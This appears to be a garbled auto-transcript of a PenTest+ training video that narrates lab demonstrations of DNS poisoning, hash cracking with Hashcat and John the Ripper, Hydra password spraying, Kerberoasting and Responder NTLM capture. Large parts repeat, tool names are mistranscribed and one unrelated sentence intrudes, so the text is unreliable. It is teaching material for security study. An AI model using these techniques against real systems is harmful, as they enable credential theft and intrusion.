That's the issue right there. Okay. Well, I guess we could fire that machine up, but, or we can just, it's always more than one way to scan it, right? Let's change the DNS information here. Control, yes, that's what I want. Go, yeah, do it now. We're looking for the networking and sharing center, yes. Excellent. Go to adapter settings. Change this, because I believe I hard-coded that, maybe. Go to IPv4, hit properties. Yep, hard-coded. Love it. Easy change, ladies and gentlemen. Put that on 1, hit OK, hit close, and now close all this. Let's go back to this, and we'll do ipconfig just to verify, /all. Now looks a little more useful. See if that works for us. We'll go back here and we'll re-target one that bad boy. Excellent. And now start ARP poisoning to the thing. Yes, go. ARPing. Craziness. Okay, now let's do a ARP-A to verify that is working. I do see it. That does look good. That does look good. How about a ping www.facebook.com? Oh, there we go. That helps when you do the right DNS server. There you go. But you notice that it thinks Facebook.com is now 131, which we know is not true. You can ping Facebook.com right now on your normal machine. You're not going to get 192.168.241.131. We've successfully poisoned that. If we do a ipconfig/display DNS, hey, look at that, Facebook.com. Go figure. These machines, they're crazy, aren't they? So much fun, though. And now, any request made to that, if I set up like a fake Facebook.com with a login portal, guess what? I can just credential harvesting with that. That would be a lot of fun for this guy, not so much for Facebook, right? Or the intended target that was trying to glean that information from. So there you go. DNS cache poisoning, all wrapped up in a bow.
All right, well, plenty of poisoning happening here. Remember, we actually did take a look at ARP poisoning and DNS poisoning. These are two different techniques that are actually used because of the networking protocols that are out there. So that will be it for this episode, but there's plenty of more PenTest Plus to come, so make sure you when the common attacks that you can take. That's right, thank you for joining us as we continue on with PenTest Plus. Today we're taking a look at password attacks, and even though, Daniel, it actually sounds fairly simple, you're going to figure out what my password is and get in, there's actually going to be multiple different ways that people pull this off, because, I mean, I guess you could guess my password, but that's not all there is to it.
No, I mean, at the end of the day, a lot of times it does come down to a type of guessing your password. Ultimately, you can do like, I think Ronnie, he really likes dogs. Maybe he's, Fufu79 or something like that. And I figure out, yeah, he's got a sticky note pasted to his keyboard on his monitor or something like that. That does occur. So if you're in the building or you have access to physically his machine, maybe you can crack a password that way or just guess what you think it might be. But typically we're doing some sort of automation, the types of attacks that can allow us to grab hash passwords and crack those hashes, and then now we've got the correct thing we're looking for. Ultimately, that's what we're usually talking about when it comes to password attacks. There's some types to get through and then some tools and techniques for employing password attacks. So we get it.
Yeah, the idea here of just clear passwords, you're right. There's a possibility that may be that way. But most often, what we're really looking at a lot of times when we start to do this is some type of hash type of attack, right?
That's exactly right. When you have those hashes, that's nice, but for most intents and purposes, we'll get to a technique in a different episode that touches on, well, if I have a hash, I can just use that. Right. But for our intents and purposes, we want to crack those hashes. I want to know what the password is underneath the veil of secrecy. How do we do that? Well, first we need to understand a couple of things. There are a couple of different types of hash cracking techniques that you might do. One of them is going to be brute forcing. The other will be dictionary. Right? There's also rainbow tables. If we want to throw that in the mix, we can. But for our conversation, I think we'll keep it to brute forcing and dictionary attacks. So on brute forcing side of things, it's literally the idea of what you're thinking of in your head. I'm going to start with 0. Then I'm going to say 0, 0. Then I'm going to 0, 0, 0, and 0, 0, 0. Okay, and if I define this to be 10 characters long, I've got 10 zeros. Now it's 1, 0, 0, 0, 0. 2, 0, 0, and so on and so forth, until I find the right combination of the character sets that I fed it to hopefully crack the password. The way that works is it takes that value that all those zeros or all those A's or whatever it is that you put in that's attempting, it looks at the hash that you have currently, and then hashes that value with the same hash type, the same hash algorithm, and then compares the two hashes together. Is this the same? When I hash this value, do I get the same hash that I have that I'm trying to crack? If it's not the same hash, well, then I got the wrong password, and I need to move on. There's the idea of collisions where the same input will generate different hashes, or is the other way around? Same hash generates different outputs. Right? So there you go. That's collisions. Yeah, but there you go. That's brute forcing. It can take a long time. It's not a lot of fun to do brute force. What we normally do is use some sort of dictionary attack. Because the great thing about dictionary attacks is if your password is in the dictionary that I have, not the human dictionary necessarily, but the file of words that I'm going to use to correct the password, then I win. And that's what it boils down to. And because people are really good at coming up with passwords, really good, that's called sarcasm. I don't know if you know. Exactly. Because of that factor, it's very probable that I will find a password that is in a dictionary file of either my own making or one that I've downloaded from the internet.
Okay. Now, even with that, right, it still sounds like it takes a long time to compare every possible hash that's out, even if it's in the dictionary. So what are some tools that we might end up using to help us?
Help us do this? Yeah, he's right. It can still take some time. I've definitely waited hours before. Oh yeah, depending on the password itself and the size of the dictionary file and where that password lies in that dictionary. If you get lucky and it's at the beginning of it, well, yay, but if you get lucky and it's at the end of it, it's a huge dictionary file. It could take a hot minute. So just be prepared to sit and wait on that. So that's it. Tools is what Ronnie's asking as well. First one I want to talk about is Cool. Okay, Cool is a neat little tool. Let me just kind of give you some of the I'll just use the help file here. Cool, CEWL, which is horribly small for you. There we go. That looks a little better. Dash help. And what Cool does is it helps us to build custom password files. And it does this by way of going to your target's website and kind of scraping words that you define when it comes to length and so on, how far down the rabbit hole it goes, or following links, how deep should it look for new words. Because I don't know if you know, a lot of people like to make passwords based off of where they work, especially if it is their work-related password.
That makes, yeah.
When I worked for research, right? We had to ban people from using things like, I worked for Farm Bureau, I'll look at it. And you could use Farm, or Bureau, or Farm Bureau, or Insurance, and because we're in Gainesville, you could use Gainesville, or Gators, or University of Florida, or any of that stuff, or TiVo, because that's what people love to use, right? So we had to say, you cannot use that, because those are in dictionary files. It made it more complex, but that's what we're trying to do when it comes to stopping password attacks. So with this, Cool is great for doing that, and you can kind of like sit through the website. Here you go, you just kind of, the depth to spider default is to the minimum word length. You tell it that, should it go off site to other sites? Yes or no? Should I exclude anything? Should I allow any specific pattern that must be followed? Where should I write that to? Pretty simple. And then it just kind of scrapes the website and dumps that into a file. Now you have a word file. It's a great way to do it. So Cool is an awesome tool for generating custom word files. There are other word files. Let's see if I do ls on user shared. I'm in Kali, Linux. But if you do word lists, I'll do that. Got a few of them there. RockU is probably one of the more commonly used ones. You should be familiar with RockU. Fast Track is another pretty decent one. Derb and Derbuster and all these other directory fuzzing tools, they can be used as well because they have dictionaries they can be using. We also have SecLists. Definitely go check out SecLists. Let's SecLists. And in there is, wait for it, passwords, right? So passwords. And in there's a bunch of different password lists in there. So 500 words passwords. We've got common credentials. That's in the directory we keep down there. There's a bunch of common credential usernames and passwords in there. Crack hashes that they know of. Some dark web. There's more. We can default creds, leak databases, so on and so forth. A lot of great password lists for you to be able to use. You know, please hack responsibly. So anyway, there it is. That being the case, now we understand where dictionary files come from and things of that nature. Let's talk about the tools that actually employ this stuff. John the Ripper, Hashcat, right? I guess can enable can use word list. I'm not sure if Oakcrack can. I think it can. Loftcrack. These are all tools that we use. Most commonly, it's probably going to be your John the Ripper or Hashcat. Very, very popular. You start getting rainbow table land, then we have Oakcrack. So let's take a look at some of these tools.
Go ahead and get started.
So see this, and let's actually have a couple of files. So we've got VRAP, Hashcat, and VRAP. So what I did was this is a post-exploitation type of thing. I've already exploited. I found my way into the system at large. I can grab the shadow file, which has the hash passwords. And now I'm looking to pivot and laterally move into further into the network. I want to grab some passwords to help me do that. So that's what I've done. And if I cat those, so if I cat VRAP, they're the same file, just name them differently, right? I have the username and the hash password for each of these. Let's use which one we use first, right? We're going to use Hashcat or John the Ripper. Let's do Hashcat. So if you're unfamiliar with Hashcat, the help file will be helpful. So Hashcats. That's not right. Hashcats. And then just help, of course. And that was just up. And it's a little dinky because it gets around. Actually, the thing at the bottom is what's one of the most useful things is the examples, right? So it's showing you the attack mode. If I want to do a word list attack and the hash type, it's going to be the example command of hashcat-a equals or 0, which is the word list type, the other mode that you do the attack mode, right? Then you have this -m, which is the hash type. So label hash type, like, what is 400? Well, if we scroll up, you can see, wow, that is horrible. I'll zoom in. These numbers over here, I'll show the top. Where'd you go? Is it still horrible? It's still horrible. There we go. I will zoom in. Don't worry. If you scroll to the top, oh, I actually went out of memory for the terminal. But these are the numerical values for this type of hash, right? So you notice that that's a network protocol. But here's all a bunch of operating systems. So where did I get this? Oops. You can see there's QNX ST Shadow MD5. I'm not using QNX, but that's what I would want. I want that 19,000. For me, I did 500, right? Because I'm using Unix MD5 hashing. You'll notice it gives me a little $1, right? And if we cat that VWAP, hash, yeah, you'll notice it is $1, $1. Oh, so very helpful. That's where I get the 500 from. Or that's where they got it from. They had 400, but that's what I'm using. I'm using 500 because that's what I'm working with. And then you get the hash value you want to work with, and then the dictionary value you want to crack with. Pretty straightforward. Let's give it a shot. Clear this out, and we're going to do hashcats. Yeah, hashcat. Dash A was 0, dash M was 500 for us, and then the file was bwap.hashcat. Yeah, I just labeled it .hashcat. You can name it .blah if you want. It doesn't matter. That's not like a thing you have to do. Then you do have to get the password file. I'll use Rocky. User, share, word lists, and there's a Rocky.txt. Fire off. This can take a hot second. There we go. It's starting to go. It's trying to says remove one hash from the top file. So what's doing is it's I was testing before. Top files are typically where it stores correct passwords. It did correct one for me when I just got through one. So what's doing now is running through that hash file, and it's looking at those different hashes and it's comparing that with the Rocky word list. It's working its way through that. How long does that take? Who knows, right? It can take a hot minute. I guess I could background this process when we come back to the secret passwords. So I will Control V this. It stopped. I guess I should have BG'd it. So BG was its BG percent one. Yeah, there we go. Everything's right now. So do jobs. It's still stopped. FG. And so there we go. Now it's running. Wait, I don't remember how to not make it stop. I thought it was. I would have to run it with the ampersand. That's how you do it. That's how you background a job. Me and my Linux is getting crazy. Anyway, we'll kill it because we'll come back. Ultimately, it did crack a password. It will crack. It just takes time, of which we do not have to continue to wait for. Let's show you a little bit of John River, kind of like juxtaposed the two. John's pretty good at figuring out what hash you're using, and he'll try to guess. So I'll just do John. That's how you invoke John River. And we'll do -w equals user share word lists rocku.txt. There's my word list file, and then I'll give it the bwap dots, what did I JTR, that's what I call this. Fire off. Once it's done, it says, oh, I'm detecting the hash type of MD5 crypt. And look, it already cracked the password. That was the same one that I cracked earlier with hashcat. So we have user Neo, his password is Trinity. I should now be able to log into systems using that good username and password. It's going to continue to work with the list. Like I said, I'm just going to kill that right now. Ultimately, when it's done, hopefully you have more than one, but if not, you have one more than you did. There is some straight up dictionary brute forcing right there. Super fun.
All right, now our next category here is password spraying. Can you help us out and understand what that really is?
Okay, so password spraying is where, this is always fun. It's basically a fancy technique, or a fancy name for a technique, to take advantage of the idea that people use passwords, right? So we've got Neo here with his Trinity password. Does Neo use Trinity anywhere else in his life as a password? Most likely. Statistically, yes, he has done that and is currently doing that. So password spraying is where I can go, oh, well, let me use that. Right now it's also credential stuffing, there's that as well. But ultimately with password spraying, what we typically do is say, there are commonly used passwords out there. I want to use those commonly used passwords, and maybe I don't know Neo's password yet. Maybe there's another username and password that's extremely common. So let's say we enumerated a username Billy, right? So we got Billy, let me clear the screen. And I've got, let's do an in-app, -t5, -n, -p. I'm gonna look for some FTP login on an IP address that I came across. Nope, that's, yeah, 130. Oh, look at that, FTP is open, right? That's one, no, it's 140. Let's make sure 140 is open. All right, so that's open as well. Excellent. We got a couple machines. FTP is open. I'm going to basically try passwords that I know are good, but I'm not going to try a bunch like you saw at Rocky. Rocky's a big file. It's got a lot of passwords. I don't have time to go through all that. Plus, I can hit by lockouts, right? So what I can do is do password spraying, do commonly used passwords against known user accounts. I won't hit lockout thresholds because I'm only going to do maybe 4 or 5 passwords, right? So it's unlikely that I'll hit lockout threshold at that point. And then if that doesn't work, move on to the next user. Move on to the next user. Odds are one of those users is using one of those either leaked database passwords, right, or those most commonly used passwords, right? So how do we do that? We can use there are specifically password spraying tools that you can download. I think one called Spray. But you can use other password tools as well. I'm just going to use Burp Suite. Anything that will allow you to feed a username list and a password list at the same time, and you control how much and how little is being used. So I'm going to use a couple of, well, I'm going to use 8, I'm going to use all of them. I'm going to introduce you to a few tools here. Let me use we're going after this FTP site. There's Hydra, there's Medusa, and there's Potator. Potator? I'm not sure. Anyway, all 3 of these tools will hack or attempt password brute force or dictionary attacks against FTP and other services as well. So check those out. I'm going to use Hydra for this because Hydra's my go-to usually. So what I'm going to do is Hydra, I'm going to do a -l, right? So -l will give me a list and I'll have my users.txt file. Then I can do a -p like that and I can get my password.txt file. These are going to be the usernames and passwords I wish for it to try. And then I tell it FTP, this is the service, whatever service I'm attacking, and then the IP that's associated with it, 140. Now, I will go ahead and be honest with you, I don't have a user.txt file nor a pass.txt file at this moment in time. I say we create one. Let me split the screen here. We'll go vertically, that's fine. And let's do this. We will nano, we'll call it users.txt. And I enumerated the user Billy. I think there's probably going to be root. Yeah, that's good. There's a couple of users I assume to be useful. I'll control S and control X. And now I will nano passwords.txt or pass.txt is what I did. There we go. And I'll get some passwords. Well, I know one password, just one, which is 1, 2, 3, 4, 5, 6. That's a commonly used password. It's in the password top 10 list. So yay, fun. Password. And there we go. I'll do test and guest. There we go. There's our password spray list. Control S. Now we can exit this. This should now work. Whoa. Control S. That looks good. Fire and forgets. Hydra not found. Hydra, you're absolutely right. That is not a command, Daniel. Hydra. There we go. It's rocking and rolling, starting it. So it's got a restore file, but I just keep waiting. Session overriding for it. Okay, so I had the Hydra session, and it's trying this. No. Hopefully it shouldn't take too long. It should start doing the threads. That's the unfortunate thing about doing password attacks is, oh, there we go. We have hits. Yay. On this host, we have login Billy. His password is 1, 2, 3, 4, 5, 6. Billy, you horrible man, you. What am I thinking? Not good. But there you go. That's password spraying. I use a very short list of against probable or known users, so I don't hit thresholds. And I'm just looking for whoever has the worst password. Sanity.
All right. Now we also have one called curb roasting. Probably people aren't as familiar with this one.
Yeah, curb roasting is an instrument that's going against Windows systems, Windows operating systems. So Windows operating systems use curb roast for authentication. And what's the neat thing about that is if you ever find your way into a Windows system, you can employ curb roasting to try to gain access to further your access into their environment. This pivoting, lateral movement, that kind of stuff. So curb roasting, what it allows us to do is try to go against our service accounts, right? So let me show you what I mean. There's things called SPNs, service principal names, that we typically give to service accounts so they're easily used within the curb roast environment. So we don't have to remember their exact name, we can use the SPN. But yeah, remember curb roast, there's tickets, ticket granting tickets, and TGSs and all sort of fun stuff that goes along with working with the curb roast system. A lot of times you're saying, hey, if I need to use a service, I need that TGS for that service. We just don't ever see it. Well, what if I could? What if I could see that information? What do we do? Well, we can do that with the Impacket suite, very good suite of tools. And for our intents and purposes, I'm going to use the Impacket dash, what is it? Is get user SPNs. Yeah, I just did a tab complete there to get this going. And you do dash DC dash IP to get the IP address of the DC. I've got one of 192.168.241.200. So go to Microsoft to make sure they're going crazy, have a good time. And then the next thing you do is just get the domain and the username of the user account that you already have. Remember, it's post-exploitation. I probably got a username and password already built in or that are correct. So what I do is mine is example.com, and my user is thanks, which says thanks. Right? If I click that, it's going to ask for his password. I'm going to put that in if I can. You'll notice I was able to retrieve an SPN called MSSQL_service from this lovely domain controller. All right, cool. Now I want that that hash for that password. If I do a request on the end of that, it will request that. And whoa, there it is. So now I can feed that into John the Ripper, Hashcat, and hopefully, because server accounts are created by people, and people aren't the greatest at creating good passwords, I find it in a dictionary file, or I can brute force it, but it's offline now. I have this, I can just take my time, put in my password, cracking rig, and let it do its thing. So that's one way of getting a hash for using Kerberos.
All right, we also have a category here, a little bit, I think, older maybe, NTLM relay attacks.
NTLM relay attacks. Guess what? Your system in Windows is still using NTLM. A lot of people are like, why are we still doing this? Shouldn't do that, but it does leave us open to attack, and that's why I said about that. Kerberos, when it doesn't work, it will default back to NTLM, and other systems will also use NTLM. Right? One of the first ones that come to my mind is when you're doing like SMB. Right? A lot of times, if you're looking up shares, it will use NTLM and ask you actually to authenticate, and you will send an NTLM v2 hash between the systems to let you know I'm authenticated. Fun, right? So interesting thing. Basically, with NTLM, a relay attack, it's a man-in-the-middle type of attack. So I'm going to poison some people, make them think that I'm the right destination for their information, and I'm going to pass that along to the actual intended destination, gathering that info throughout the entirety of that conversation. I can do that, which one of the most fun ways in which you can do this is using a tool called Responder. I'm going to do responder. There we go. I'm going to do -I for interface, which is ETH0 for me. I like to do -V for it to be very verbose, or just verbose. You can do more than one. I'm going to fire it off. Give it my password. And you can see that it's doing some stuff. What's it doing? Well, its main function is poisoning LMNR and MBT-NS. Right? So this is LMNR, which is link local multicast name resolution. Look at me knowing an acronym. I know, right? That's a fun one. And then MBT is the NetBIOS name service. Right?
Yeah.
So what happens here? How does this work? Glad you asked. It's so much fun. When people try to use those systems, it's kind of like a quick and dirty DNS, right? But it's using NetBIOS. Right? So if anybody looks it up, I'm poisoning him saying, I've got your lookup right here. Come to me for that. Send me that information, and we'll gather that information. Let's jump over to my Windows workstation I have here. There we go. And if I look up a share, okay, I gotta do whack. What was it? Win. I think Win10. Am I Win10? Anyway, let's see if it's already doing it. You'll notice I've already started to poison answers. We can see that's happening. You can see there's a name for Win, this, that, and the other. But if we actually start looking for shares, I'm surprised the shares that show up there. Show me some shares. Oh, there we go. So let's say Win-B03K, blah, blah, blah. And now there's an example share. Great. Look up here. This is an NTLM v2 hash that I can now put into a file and ask Hashcat or John the Ripper to crack for me. And I will have another username and password. And that looks like it's for the administrator account, so that's fun. So when you're in engagement in a Windows environment, one of the first things you like to do is just crank up a responder and see what you can grab. This is an internal thing. Just let it do its work, and you'll grab a ton of passwords and usernames using that method.
All right, Daniel, well, that's quite a bit on password cracking, but that doesn't mean that you have to remember them all. You have the entire subject you can lock in. Let's do a quick review here. So in the beginning, we did take a look at the different tools that we can use for hash cracking, as well as Daniel described the concept here of password spraying and Kerberoasting, which I think is funny to say. And of course, lastly, the idea of NTLM. These demonstrations are, of course, to actually help you to figure out how to do this and what the context to put them in as well. But that's not all there is, of course, to PenTest Plus, and there is more to come with Daniel Lowry, so make sure you stay tuned for the very next episode.
But I do think we've got the building blocks in place to continue to have a stable 2023. Okay, there's a couple questions in the chat, and I'll try to capture them. The Gen Global are receiving a...
When the common attacks that you can take advantage of is a That's right. Thank you for joining us as we continue on with PenTest Plus. Today we're taking a look at password attacks, and even though, Daniel, it actually sounds fairly simple, you're going to figure out what my password is and get in, there's actually going to be multiple different ways that people pull this off, because, I mean, I guess you could guess my password, but that's not all there is to it, is it?
No, I mean, at the end of the day, a lot of times it does come down to a type of guessing your password. Although you can do like, I think Ronnie, he really likes dogs. Maybe he's, Fufu79 or something like that. Now, I figure out. Yeah, he's got a sticky note pasted to his keyboard on his monitor or something like that. That does occur. So if you're in the building or you have access to physically his machine, maybe you can crack a password that way or just guess what you think it might be. But typically we're doing some sort of automation, the types of attacks that can allow us to grab hash passwords and crack those hashes, and then now we got the correct thing we're looking for. Ultimately, that's what we're usually talking about when it comes to password attacks. Some types to get through, and then some tools and techniques for employing password attacks. So that's what we get.
Yeah, the idea here of just clear passwords, you're right. There's a possibility that may be that way. But most often, what we're really looking at a lot of times when we start to do this is going to be some type of hash type of attack, right?
That's exactly right. When you have those hashes, that's nice, but for most intents and purposes, we'll get to a technique in a different episode that touches on how if I have a hash, I can just use that. Right. But for our intents and purposes, we want to crack those hashes. I want to know what the password is underneath the veil of secrecy. How do we do that? Well, first we need to understand a couple of things. There are a couple of different types of hash cracking techniques that you might do. One of them is going to be brute forcing. The other will be dictionary. Right? There's also rainbow tables. We want to throw that in the mix we can. But for our conversation, I think we'll keep it to brute forcing and dictionary attacks. So on brute forcing side of things, it's literally the idea of what you're thinking of in your head. I'm going to start with 0. Then I'm going to say 0, 0. Then I'm going to 0, 0, 0, and 0, 0, 0. Okay, and if I define this to be 10 characters long, I've got 10 zeros. Now it's 1, 0, 0, 0, 0. And so on and so forth, until I find the right combination of the character sets that I fed it to hopefully crack the password. The way that works is it takes that value, that all those zeros or all those A's or whatever it is that you put in that's attempting, it looks at the hash that you have currently, and then hashes that value with the same hash type, the same hash algorithm, and then compares the two hashes together. Is this the same? When I hash this value, do I get the same hash that I have that I'm trying to crack? If it's not the same hash, well, then I've got the wrong password, and I need to move on. There's the idea of collisions where the same input will generate different hashes, or is the other same hash generates different outputs. Right? So there you go, that's collisions.
Yeah,
but there you go. That's brute forcing. It can take a long time. It's not a lot of fun to do brute force if you're. What we normally do is use some sort of dictionary attack, because the great thing about dictionary attacks is if your password is in the dictionary that I have, not the human dictionary necessarily, but the file of words that I'm going to use to crack the password, then I win. And that's what it boils down to. And because people are really good at coming up with passwords, really good. That's called sarcasm. Exactly. That's because of that factor, it's very probable that I will find a password that is in a dictionary file of either my own making or one that I've downloaded from the internet.
Now, even with that, right, it still sounds like it takes a long time to compare every possible hash that's out, even if it's in the dictionary. So what are some tools that we might end up using to help us?
Help us do this? Yeah, he's right. It can still take some time. I've definitely waited hours before. Depending on the password itself and the size of the dictionary file and where that password lies in that dictionary. If you get lucky and it's at the beginning of it, well, yay. But if you don't lucky and it's at the end of it, it's a huge dictionary file. It could take a hot minute. So just be prepared to sit and wait on that. So that's a tool. Is what Ronnie's asking as well. First one I want to talk about is Cool. Okay, Cool is a neat little tool. Let me just kind of give you some of the. I'll just do the help file here. Cool, CEWL, which is horribly small for you. There we go. That looks a little better. dash help. And what cool does is it helps us to build custom password files. And it does this by way of going to your target's website and kind of scraping words that you define when it comes to length and so on, how far down the rabbit hole it goes, or following links, how deep should it look for new words. Because I don't know if you know, right? A lot of people like to make passwords based off of where they work, especially if it is their work-related password.
That makes, yeah.
When I worked for a right? We had to ban people from using things like, I worked for Farm Bureau, I'll look the other way. And you could use Farm or Bureau or Farm Bureau or Insurance, and because we're in Gainesville, you could use Gainesville or Gators or University of Florida or any of that stuff, or TiVo, because that's what people love to use, right? So we had to say you cannot use that, because those are in dictionary files. It made it more complex, but that's what we're trying to do when it comes to stopping password attacks. So with this, cool is great for doing that, and you can kind of like sit through the website. Here you go, use kind of the depth to spider default is to the minimum word length. You tell it that. Should it go off site to other sites? Yes or no? Should I exclude anything? Should I allow any specific pattern that must be followed? Where should I write that to? Pretty simple. And then it just kind of scrapes the website and dumps that into a file. Now you have a word file. It's a great way to do it. So cool is an awesome tool for generating custom word files. There are other word files. Let's see if I do ls on user share. I'm in Poly Linux. But if you do word lists, I'll do that. Got a few of them there. RockU is probably one of the more commonly used ones. You should be familiar with RockU. Fast Track is another pretty decent one. Derb and Derbuster and all these other directory fuzzing tools, they can be used as well because they have dictionaries they can be using. You also have sec lists. Definitely go check out sec lists. Let's sec lists. And in there is, wait for it, passwords, right? So passwords. And in there's a bunch of different password lists in there. So 500 words passwords. We've got common credentials. That's in the directory we go down there. There's a bunch of common credential usernames and passwords in there, crack hashes that they know of, some dark web. There's more. We can default creds, leak databases, so on and so forth. A lot of great password lists for you to be able to use. Please hack responsibly. So there it is. That being the case, now we understand where dictionary files come from and things of that nature. Let's talk about the tools that actually employ this stuff. John the Ripper, Hashcat, right? I guess can enable can use word list. I'm not sure if Oakcrack can. I think it can. Loftcrack. These are all tools that we use. Most commonly, it's probably going to be your John the Ripper or Hashcat. Very, very popular. You start getting Rainbow Table Land, then we have Oakcrack. So let's take a look at some of these tools real quick. You control C this, include the screen, and let's actually have a couple of files here. We got bwap.hashcat and bwap.jtr. So what I did was this is a post-exploitation type of thing. I've already exploited. I found my way into the system at large. I can grab the shadow file, which has the hash passwords, and now I'm looking to pivot and laterally move further into their network. I want to grab some passwords to help me do that. So that's what I've done. And if I cat those, so if I cat bwap.anything, they're the same file, just named them differently, right? I have the username and the hash password for each of these. Neo, Alice, Wolverine, Johnny, and Sling. Okay. Let's use which one we use first, Ryan? You want to use Hashcat or John the Ripper? Let's do Hashcat. I like Hashcat. So if you're unfamiliar with Hashcat, the help file will be helpful. So hashcats. That's not right. Hashcats. And then just dash help, of course. And that loads this up, and it's a little janky because it kind of gets around. But actually, the thing at the bottom is what's one of the most useful things is the examples, right? So it's showing you the attack mode. If I want to do a word list attack, and the hash type is going to be the example command of hashcat-a equals or is 0, which is the word list type, the other mode that you do, the attack mode, right? Then you have this -m, which is the hash type. So label hash type, like, what is 400? Well, if we scroll up, you can see, wow, that is horrible. I'll zoom in. These numbers over here, let's go to the top. Where'd you go? Is it still horrible? It's still horrible. There we go. I will zoom in, don't worry. If you scroll to the top, I actually went out of memory for the terminal. But these are the numerical values for this type of hash, right? So you notice that that's a network protocol. But here's all a bunch of operating systems. So where did I get this? Oops. You can see there's QNX, Etsy Shadow, MD5. I'm not using QNX, but that's what I would want. I want that 19,000. For me, I did 500, right? Because I'm using Unix MD5 hashing. You'll notice it gives me a little $1, right? And if we cat that to bwap, bwap.hash, yeah, you'll notice it is $1, $1. Oh, so very helpful. That's where I get the 500 from. Or that's where they got from. They had 400, but that's why I'm using 500, because that's what I'm working with. And then you get the hash value you want to work with, and then the dictionary value you want to crack with. Pretty straightforward. Let's give it a shot. Clear this out, and we're going to do hashcats. Yeah, hashcat. -a was 0, -m was 500 for us, and then the file was bwap.hashcat. Yeah, I just labeled it .hashcat. You can name it .blah if you want. It doesn't matter. That's not like a thing you have to do. Then you do have to get the password file. I'll use RockU. User, share, word lists, and it's RockU.txt. Fire off. This can take a hot second. There we go. It's starting to go. It's trying to say remove one hash from the top file. So what it's doing is, it's as I was testing before, top files are typically where it stores cracked passwords. It did crack one for me when I just got through one. So what it's doing now is running through that hash file, and it's looking at those different hashes, and it's comparing that with the RockU word list. It's working its way through that. How long does that take? Who knows, right? It can take a hot minute. I guess I could background this process and we can come back to see cracks and passwords. So I will control V this. It stopped. I guess I should have BG'd it. So BG was its for BG. Percent one, is that it? Yeah. There we go. Everything's right now. So the jobs. It's still stopped. FG. And there we go. Now it's running. I don't remember how to not make it stop. I thought it was, I would have to run it with the ampersand. That's how you do it. That's how you background a job. Me and my Linux is getting crazy. Anyway, we'll kill it because we'll come back. Ultimately, it did crack a password. It will crack. It just takes time, of which we do not have to continue to wait for. Let's show you a little bit of John the Ripper. It's kind of like juxtaposed the two. John's pretty good at figuring out what hash you're using, and he'll try to guess. So I'll just do John. That's how you invoke John the Ripper. And we'll do -w equals user share word lists rocku.txt. There's my word list file. And then I'll give it the bwap dots, what did I JTR, is what I called it. Fire off. Once it's done, it says, I'm detecting the hash type of MD5 crypt. And look, I already cracked the password. That's the same one that I cracked earlier with hashcat. So we have a user Neo. His password is Trinity. I should now be able to log into systems using that good username and password. It's going to continue working with the list. Like I said, I'm just going to kill that right now. Ultimately, when it's done, hopefully you have more than one, but if not, just have one more than you did. There is some straight up dictionary brute forcing right there. Super fun.
All right, now our next category here is password spraying. Can you help us out and understand what that really is?
Okay, so password spraying is where, this is always fun. It's basically a fancy technique, or a fancy name for a technique to take advantage of the idea that people use passwords, right? So we got Neo here with his Trinity password. Does Neo use Trinity anywhere else in his life as a password? Most likely. Statistically, yes, he has done that and is currently doing that. So password spraying is where I can go, well, let me use that. Right? Now it's also credential stuffing, there's that as well, but ultimately with password spraying, what we typically do is say, there are commonly used passwords out there. I want to use those commonly used passwords, and maybe I don't know Neo's password yet. Maybe there's another username password that's extremely common. So let's say we enumerated a username Billy, right? So we got Billy, let me clear the screen. And I've got, let's do an nap, -t5, -n, -p. I'm going to look for some FTP login on an IP address that I came across. Nope, that's 130. Oh, look at that, FTP is open, right? Is that the one? No, it's 140. Let's make sure 140 is open. All right, so that's open as well. Excellent. So we got a couple machines, FTP is open. I'm going to basically try passwords that I know are good, but I'm not going to try a bunch like you saw at RockU. RockU's a big file, it's got a lot of passwords. I don't have time to go through all that. Plus I can hit by lockouts, right? So what I can do is do password spraying, do commonly used passwords against known user accounts. I won't hit lockout thresholds because I'm only going to do maybe 4 or 5 passwords, right? So it's unlikely that I'll hit lockout threshold at that point. And then if that doesn't work, move on to the next user. Move on to the next user. Odds are one of those users is using one of those either leaked database passwords, right, or those most commonly used passwords, right? So how do we do that? We can use there are specifically password spraying tools that you can download. I think one called Spray, but you can use other password tools as well. I'm just going to use Burp Suite. Anything that will allow you to feed a username list and a password list at the same time, and you control how much and how little is being used. So I'm going to use a couple of, well, I'm going to use 8, I'm going to use all of them. I'm going to introduce you to a few tools here. I'm going to use we're going after this FTP site. There's Hydra, there's Medusa, and there's Potator. But for? Not sure. Anyway, all three of these tools will hack or attempt password brute force or dictionary attacks against FTP and other services as well. So check those out. I'm going to use Hydra for this because Hydra's my go-to usually. So what I'm going to do is Hydra. I'm going to do a -L, right? So -L will give me a list, and I'll have my users.txt file. Then I can do a -P like that, and I can get my password.txt file. These are going to be the usernames and passwords I wish for it to try. And then I tell it FTP : this is the service, whatever service I'm attacking, and then the IP that's associated with it, 140. Now, I will go ahead and be honest with you, I don't have a users.txt file nor a pass.txt file at this moment in time. I say we create one. I'm used to the screen here. We'll go vertically, that's fine. And let's do this. We will nano, we'll call it users.txt. And I enumerated the user Billy. I think there's probably going to be root. Yeah, that's good. There's a couple of users I assume to be useful. I'll control S, then control X. And now I will nano passwords.txt, or pass.txt is what I did. There we go. And I'll get some passwords. Well, I know one password, which is fun, which is 1, 2, 3, 4, 5, 6. That's a common used password. It's in the password top 10 list. So, yay, fun. Password. And there we go. I'll do test and guest. There we go. There's our password spray list. Control S, Control X. Now we can exit this. This should now work. Whoa. Control S. That looks good. Fire and forgets. Hydra not found. Hydra. You're absolutely right. That is not a command, Daniel. Hydra. There we go. It's rocking and rolling, starting it. So it's got a restore file, but I just keep waiting. Computer system overriding. Okay, so I had the Hydra session, and it's trying this. Now, hopefully it shouldn't take too long. It should start doing the threads. That's the unfortunate thing about doing password attacks. Oh, there we go. We have hits. Yay. On this host, we have login Billy. His password is 1, 2, 3, 4, 5, 6. Billy, you horrible man, you. What am I thinking? Not good. But there you go. That's password spraying. I use a very short list of against probable or known users, so I don't hit thresholds. And I'm just looking for whomever has the worst password. Sanity.
All right. Now we also have one called curb roasting. Probably people aren't as familiar with this one.
